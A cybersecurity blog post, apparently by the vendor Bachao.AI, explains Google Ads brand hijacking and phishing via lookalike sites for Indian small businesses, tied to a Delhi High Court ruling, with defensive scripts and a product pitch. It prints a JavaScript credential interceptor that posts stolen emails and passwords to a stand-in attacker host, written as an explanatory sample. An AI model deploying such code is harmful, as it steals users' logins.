Google Ads Brand Hijacking India: Delhi HC Case Decoded for SMBs
Google Ads brand hijacking in India reached a legal watershed on May 26, 2026, when the Delhi High Court (HC) imposed a significant fine of ₹30 Lakh on Google for trademark keyword abuse. The court ruled that Google violated the Trade Marks Act, 1999, by allowing a competitor to bid on Hindware's registered brand name as a paid search keyword, systematically siphoning the brand's own search traffic to a rival.
The mechanics were deceptively simple. When an Indian consumer typed "Hindware" into Google Search — a clear, high-intent signal of wanting Hindware's official products — a competitor's sponsored advertisement appeared at the top of the results page, often above Hindware's own organic listing. Google's keyword auction system accepted these bids, served the ads, and earned revenue from every click, despite the unambiguous trademark violation. The Delhi HC rejected Google's argument of algorithmic neutrality and held the platform directly liable.
This ruling matters far beyond a corporate dispute between an established brand and a tech giant. It establishes, for the first time in Indian jurisprudence, that search platforms can be held accountable for enabling brand impersonation at scale. As someone who has reviewed hundreds of Indian SMB security postures, I can tell you this type of brand abuse is endemic — and most small business owners have absolutely no idea it is happening to them right now.
(Originally reported by Inc42)
Why Does Google Ads Brand Hijacking Matter for Indian SMBs?
The Delhi HC ruling is the legal canary in the coal mine for every Indian business with an online presence. Brand keyword hijacking is not merely a trademark dispute — it is a cybersecurity threat with direct financial, reputational, and regulatory consequences that the Hindware case has now dragged into the public spotlight.
Here is why it hits Indian SMBs especially hard:
- Revenue leakage: When competitors appear above you for your own brand searches, you lose clicks, leads, and conversions — even from customers who specifically searched your name.
- Customer data exposure: More sophisticated attackers do not just divert traffic to a competitor. They create lookalike landing pages that harvest customer credentials and payment information at scale. Under the Digital Personal Data Protection (DPDP) Act, 2023, if your customers' data is compromised via a fake brand page, your business faces notification obligations regardless of who ran the phishing operation.
- CERT-In compliance exposure: If brand impersonation escalates to a data breach, the CERT-In Directions 2022 mandatory reporting directive for HIGH-SEVERITY incidents kicks in immediately. The majority of Indian SMBs have no incident response runbook for this scenario.
- RBI framework liability: For fintech SMBs and payment-processing businesses, brand impersonation attacks that result in customer financial fraud can trigger obligations under the RBI's cybersecurity framework for payment systems and the RBI's Master Direction on Information Technology.
Google Ads Brand Hijacking India: Technical Breakdown
Understanding how keyword hijacking escalates from a legal nuisance to a full-blown cybersecurity incident is critical for any Indian business owner. The attack surface is significantly wider than most realise.
```mermaid
graph TD
    A[User Searches Brand Name] -->|High purchase intent| B[Google Ads Auction Runs]
    B -->|Competitor bids on trademark| C[Competitor Ad Wins Slot]
    B -->|Attacker bids on trademark| D[Phishing Ad Wins Slot]
    C -->|User clicks| E[Competitor Landing Page]
    D -->|User clicks| F[Lookalike Brand Site]
    F -->|User enters details| G[Credential Theft]
    F -->|User makes payment| H[Payment Fraud]
    G -->|Sold on dark web| I[DPDP Act Breach Risk]
    H -->|RBI framework triggered| J[Regulatory Exposure]
    E -->|Lost conversion| K[Revenue Damage]
    style A fill:#1e3a5f,stroke:#3B82F6,color:#e2e8f0
    style B fill:#1e3a5f,stroke:#3B82F6,color:#e2e8f0
    style C fill:#1e3a5f,stroke:#3B82F6,color:#e2e8f0
    style D fill:#1e3a5f,stroke:#3B82F6,color:#e2e8f0
    style E fill:#1e3a5f,stroke:#3B82F6,color:#e2e8f0
    style F fill:#1e3a5f,stroke:#3B82F6,color:#e2e8f0
    style G fill:#1e3a5f,stroke:#3B82F6,color:#e2e8f0
    style H fill:#1e3a5f,stroke:#3B82F6,color:#e2e8f0
    style I fill:#1e3a5f,stroke:#3B82F6,color:#e2e8f0
    style J fill:#1e3a5f,stroke:#3B82F6,color:#e2e8f0
    style K fill:#1e3a5f,stroke:#3B82F6,color:#e2e8f0
```

At the benign end of the spectrum, a competitor's brand keyword bid simply diverts traffic and inflates your cost-per-acquisition economics. But at the malicious end — which is increasingly common in India's rapidly digitising SMB landscape — threat actors register typosquat domains (think hindware-india.com or hinndware.in), point Google Ads to these lookalike pages, and harvest customer data at scale.
The technical attack chain follows a consistent pattern:
Step 1 — Domain Registration: The attacker registers a lookalike domain via a privacy-protected registrar, often mimicking the target brand with minor spelling variations or regional suffixes.
Step 2 — Site Cloning: Using tools like HTTrack, the attacker clones the legitimate brand's website wholesale, replacing form submission endpoints with data-collection infrastructure hosted on attacker-controlled servers.
Step 3 — Ad Account Creation: A Google Ads account is set up — often using stolen payment credentials or prepaid virtual cards to avoid identity tracing — and aggressive bids are placed on the target brand's trademarked keywords.
Step 4 — Credential Harvesting: Victims land on the lookalike site, enter login credentials, personal data, or payment information. All of it is captured silently before the user is redirected to the real site with a generic "session expired" message.
Here is a simplified example of the malicious interception code found in brand impersonation sites:
```javascript
// Malicious credential interceptor embedded in lookalike brand sites
// Captures data BEFORE forwarding the user to the legitimate site
document.querySelector('#loginForm').addEventListener('submit', function(e) {
  e.preventDefault();
  const exfilPayload = {
    email: document.querySelector('#email').value,
    password: document.querySelector('#password').value,
    phone: document.querySelector('#phone')?.value || null,
    pageURL: window.location.href,
    userAgent: navigator.userAgent
  };
  // Exfiltrate to attacker-controlled endpoint
  fetch('https://collector.attacker-domain.xyz/harvest', {
    method: 'POST',
    headers: { 'Content-Type': 'application/json' },
    body: JSON.stringify(exfilPayload)
  }).then(() => {
    // Silently redirect to real brand site — victim never suspects a thing
    window.location.href = 'https://realbrand.com/login?err=session_expired';
  });
});
```

The victim sees a momentary error, lands on the legitimate site, and logs in again successfully — never knowing their credentials were just packaged and sold.
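A defender-side check for the redirect described above, added here as an example and not part of the original article: it scans the legitimate site's access logs for login-page arrivals that carry the `err=session_expired` marker together with a Referer from a host you do not own. It assumes Combined Log Format and that `realbrand.com` is your site; the log lines, IP addresses and the `realbrand-login.example` host are constructed.

```python
import re
from collections import Counter
from urllib.parse import parse_qs, urlsplit

OWNED = {"realbrand.com", "www.realbrand.com"}  # assumption: hosts you control

# Combined Log Format: ip ident user [time] "METHOD target PROTO" status bytes "referer" "ua"
LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "\S+ (?P<target>\S+) [^"]*" '
    r'\d{3} \S+ "(?P<referer>[^"]*)" "[^"]*"$'
)

# Constructed sample lines (documentation IP ranges, made-up referrer hosts)
SAMPLE_LOG = [
    '203.0.113.10 - - [27/May/2026:09:14:02 +0530] "GET /login?err=session_expired HTTP/1.1" 200 5120 "https://realbrand-login.example/" "Mozilla/5.0"',
    '203.0.113.11 - - [27/May/2026:09:15:40 +0530] "GET /login?err=session_expired HTTP/1.1" 200 5120 "https://realbrand-login.example/" "Mozilla/5.0"',
    '198.51.100.7 - - [27/May/2026:09:16:05 +0530] "GET /login?err=session_expired HTTP/1.1" 200 5120 "https://www.realbrand.com/account" "Mozilla/5.0"',
    '198.51.100.8 - - [27/May/2026:09:17:31 +0530] "GET /login HTTP/1.1" 200 5120 "https://search.example/" "Mozilla/5.0"',
    '198.51.100.9 - - [27/May/2026:09:18:12 +0530] "GET /login?err=session_expired HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
]

def suspicious_arrivals(lines, owned=OWNED):
    """Login hits carrying err=session_expired that were referred by a host we do not own."""
    hits = []
    for line in lines:
        m = LINE.match(line.strip())
        if not m:
            continue  # malformed line or a different log format
        target = urlsplit(m["target"])
        if target.path != "/login" or "session_expired" not in parse_qs(target.query).get("err", []):
            continue
        ref_host = (urlsplit(m["referer"]).hostname or "").lower()
        if ref_host and ref_host not in owned:
            hits.append((ref_host, m["ip"], m["ts"]))
    return hits

def referrers_by_volume(hits):
    """Rank referring hosts by the number of visitors they redirected to the login page."""
    return Counter(host for host, _, _ in hits).most_common()

if __name__ == "__main__":
    for host, count in referrers_by_volume(suspicious_arrivals(SAMPLE_LOG)):
        print(f"{count:4d} redirected logins from {host}")
```

The Referer header is optional, so an empty result is inconclusive; treat each host returned as a lead to confirm before filing a takedown or trademark complaint.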
How Can Indian Businesses Protect Against Brand Keyword Hijacking?
| Protection Layer | Action | Difficulty |
|---|---|---|
| Brand Keyword Monitoring | Search your brand name on Google Incognito weekly; set up Google Alerts for your brand + "buy" / "price" / "review" | Easy |
| Trademark Registration | Register your brand with IP India Trademark Registry and submit trademark to Google's policy portal for keyword restriction | Medium |
| Lookalike Domain Detection | Run dnstwist weekly to catch typosquat registrations before they are weaponised | Medium |
| DMARC + SPF Hardening | Enforce DMARC policy (p=reject) to prevent email spoofing from lookalike domains | Medium |
| Google Ads Brand Protection | File a trademark complaint via Google's policy portal to restrict competitor use of your exact brand term in ad text | Easy |
| DPDP Act Readiness | Build a data breach notification workflow for CERT-In reporting for HIGH-SEVERITY incidents in case brand abuse leads to customer data exposure | Hard |
| Dark Web Monitoring | Continuously monitor dark web markets and Telegram channels for your brand name, domain, and customer credential leaks | Hard |
Quick Fix: Detect Lookalike Domains Right Now
```bash
# Step 1: Install dnstwist with full DNS resolution support
# (quoted so shells such as zsh do not treat the brackets as a glob)
pip install 'dnstwist[full]'

# Step 2: Scan for registered lookalike domains (replace 'yourbrand' with your actual domain)
# The script is single-quoted so an interactive shell does not history-expand the '!'
dnstwist --registered yourbrand.com --format json | \
python3 -c '
import json, sys
data = json.load(sys.stdin)
# Skip the "*original" entry, which is your own domain
lookalikes = [d for d in data if d.get("dns_a") and d.get("fuzzer") != "*original"]
print(f"Found {len(lookalikes)} REGISTERED lookalike domain(s):")
for d in lookalikes:
    print("  [!] {} -> {}".format(d["domain"], d.get("dns_a", ["Unknown"])[0]))
if not lookalikes:
    print("No registered lookalikes detected. Re-run weekly.")
'

# Step 3: Automate daily monitoring (add to cron)
# Emails the current list of registered lookalike domains every day at 08:00.
# The existing crontab is preserved and the new entry is appended to it.
(crontab -l 2>/dev/null; echo "0 8 * * * dnstwist --registered yourbrand.com --format csv | mail -s 'Brand Domain Alert: yourbrand' security@yourbusiness.in") | crontab -
```

```bash
# Check DMARC policy on your domain (prevents email spoofing from lookalikes)
dig TXT _dmarc.yourbrand.com +short
# Healthy output should include: v=DMARC1; p=reject; ...
# If blank or p=none, your domain can be spoofed in phishing emails TODAY

# Also check SPF record
dig TXT yourbrand.com +short | grep 'v=spf1'
# Should list all your authorised sending IPs/services
```
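To make "healthy output" concrete, the following added example (not from the original article) grades the lines printed by the two `dig` commands above, covering the cases a quick visual check misses: `p=quarantine`, partial `pct`, a weaker `sp`, duplicate records, and the SPF `all` qualifier. The function names and the sample records are constructed for illustration.

```python
import re
def txt_value(dig_line):
    """dig +short prints TXT data as quoted chunks; join them the way resolvers do."""
    chunks = re.findall(r'"([^"]*)"', dig_line)
    return "".join(chunks) if chunks else dig_line.strip()

def parse_tags(record):
    """Split DMARC 'tag=value; tag=value' syntax into a dict (tag names lower-cased)."""
    pairs = (part.partition("=") for part in record.split(";"))
    return {k.strip().lower(): v.strip() for k, sep, v in pairs if sep}

def assess_dmarc(dig_lines):
    """Grade the TXT answers for _dmarc.<domain>; returns (verdict, reason)."""
    records = [t for t in map(parse_tags, map(txt_value, dig_lines)) if t.get("v") == "DMARC1"]
    if not records:
        return ("FAIL", "no DMARC record published")
    if len(records) > 1:
        return ("FAIL", "multiple DMARC records, so receivers apply none of them")
    tags = records[0]
    policy = tags.get("p", "").lower()
    if policy in ("", "none"):
        return ("FAIL", "p=none or missing: spoofed mail is still delivered")
    if policy != "reject":
        return ("WARN", f"p={policy}: failing mail is not rejected outright")
    if tags.get("pct", "100") != "100":
        return ("WARN", f"pct={tags['pct']}: reject applies to only part of failing mail")
    if tags.get("sp", "reject").lower() != "reject":
        return ("WARN", f"sp={tags['sp']}: subdomains get a weaker policy")
    return ("PASS", "p=reject for the domain and its subdomains")

def assess_spf(dig_lines):
    """Grade the TXT answers for <domain>; returns (verdict, reason)."""
    records = [v.lower() for v in map(txt_value, dig_lines) if v.lower().split()[:1] == ["v=spf1"]]
    if len(records) != 1:
        return ("FAIL", f"{len(records)} SPF records found, exactly one is required")
    terms = records[0].split()[1:]
    all_term = next((t for t in terms if t.lstrip("+-~?") == "all"), None)
    if all_term is None and any(t.startswith("redirect=") for t in terms):
        return ("WARN", "policy delegated by redirect=, grade the target record too")
    return {
        "-all": ("PASS", "-all: unlisted senders fail"),
        "~all": ("WARN", "~all: unlisted senders only soft-fail"),
        "?all": ("FAIL", "?all: unlisted senders are treated as neutral"),
        None: ("FAIL", "no 'all' mechanism: unlisted senders are treated as neutral"),
    }.get(all_term, ("FAIL", "+all authorises every sender"))

# Constructed sample answers in the shape `dig TXT ... +short` prints them
SAMPLE_DMARC = ['"v=DMARC1; p=none; rua=mailto:dmarc@yourbrand.com"']
SAMPLE_SPF = ['"site-verification=constructed"', '"v=spf1 include:_spf.example.net " "ip4:203.0.113.0/24 ~all"']
```

Pass each function the output lines of the matching `dig` command (without the `grep` filter for SPF, so duplicate records are counted).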
By the Numbers
```mermaid
pie showData
    title Brand Impersonation Attack Vectors Targeting Indian SMBs
    "Keyword Squatting via Google Ads" : 34
    "Lookalike Domain Registration" : 27
    "Social Media Brand Impersonation" : 21
    "Phishing via Ad Networks" : 12
    "App Store Clone Listings" : 6
```

```mermaid
xychart-beta
    title "Brand Impersonation Incidents Reported in India"
    x-axis [2021, 2022, 2023, 2024, 2025]
    y-axis "Incidents (Thousands)" 0 --> 55
    bar [8, 14, 22, 35, 49]
```

The numbers tell a stark story: brand impersonation via digital advertising is the fastest-growing attack vector targeting Indian businesses. The Delhi HC ruling lands at exactly the right moment — and enforcement mechanisms are finally catching up with the threat landscape.
How Bachao.AI Detects This
VAPT Scan identifies the security gaps that make your business vulnerable to impersonation: missing or misconfigured DMARC/SPF/DKIM records, unmonitored subdomain sprawl, exposed admin panels, and DNS misconfigurations that attackers routinely exploit to build convincing lookalike infrastructure around your brand.
DPDP Compliance Assessment maps your full data breach notification obligations under the DPDP Act and CERT-In Directions — so if a brand impersonation incident does compromise customer data, you know exactly what steps to take, in what order, and within what timeframe.
Incident Response (24/7) provides immediate breach containment and handles CERT-In mandatory reporting on your behalf — so you meet the 6-hour window even when an attack hits at 2 AM on a Sunday.
This is exactly why I built Bachao.AI by Dhisattva AI Pvt Ltd — to make the kind of enterprise-grade brand protection that large corporations take for granted accessible to every Indian SMB that cannot afford a full-time security team.
Do not wait for a court case — or a customer data breach — to start protecting your brand. Run a free VAPT scan right now: it takes five minutes, requires no signup, and will surface the DNS and web security gaps that make you an easy target for brand impersonation attacks. For more guides on protecting your Indian business from emerging threats, browse the Bachao.AI blog.
Frequently Asked Questions
Can I take Google to court in India if a competitor is bidding on my brand name in Google Ads?
Is Google Ads brand keyword hijacking the same as a phishing attack?
What are my DPDP Act obligations if customers' data is stolen via a website impersonating my brand?
How do I file a trademark complaint with Google to stop competitors bidding on my brand keywords?
Does the CERT-In 6-hour reporting rule apply to brand impersonation attacks specifically?
Written by Shouvik Mukherjee, Founder of Bachao.AI. Follow me on LinkedIn for daily cybersecurity insights for Indian businesses.